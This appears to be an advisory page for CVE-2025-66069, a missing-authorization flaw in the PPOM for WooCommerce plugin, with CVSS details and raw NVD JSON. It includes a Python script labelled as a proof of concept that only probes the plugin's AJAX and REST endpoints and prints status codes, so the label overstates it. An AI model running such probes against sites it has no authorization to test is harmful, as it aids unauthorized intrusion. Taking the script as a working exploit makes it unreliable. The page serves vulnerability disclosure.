Security Vulnerability Report
中文
CVE-2025-66069 CVSS 4.3 MEDIUM

CVE-2025-66069

Published: 2025-11-21 13:15:48
Last Modified: 2026-04-27 18:16:33

Description

Missing Authorization vulnerability in Themeisle PPOM for WooCommerce woocommerce-product-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PPOM for WooCommerce: from n/a through <= 33.0.16.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PPOM for WooCommerce (woocommerce-product-addon) <= 33.0.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66069 PoC - Access Control Bypass # Target: PPOM for WooCommerce plugin <= 33.0.16 # Type: Missing Authorization # # Note: This PoC is for authorized security testing only import requests import sys TARGET_URL = 'https://example.com' # Replace with target URL COOKIES = { 'wordpress_test_cookie': 'WP+Cookie+check', # Add valid session cookies here } def check_vulnerability(): """ Check if target is vulnerable to CVE-2025-66069 """ endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/ppom/v1/', '/?rest_route=/ppom/v1/' ] print(f'[*] Testing {TARGET_URL} for CVE-2025-66069') for endpoint in endpoints: url = f'{TARGET_URL}{endpoint}' try: response = requests.get(url, cookies=COOKIES, timeout=10) print(f'[+] Endpoint: {endpoint} - Status: {response.status_code}') except requests.RequestException as e: print(f'[-] Error testing {endpoint}: {e}') print('[*] Manual verification required for full vulnerability assessment') if __name__ == '__main__': check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66069", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:47.943", "lastModified": "2026-04-27T18:16:33.050", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Themeisle PPOM for WooCommerce woocommerce-product-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PPOM for WooCommerce: from n/a through <= 33.0.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-product-addon/vulnerability/wordpress-ppom-for-woocommerce-plugin-33-0-16-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}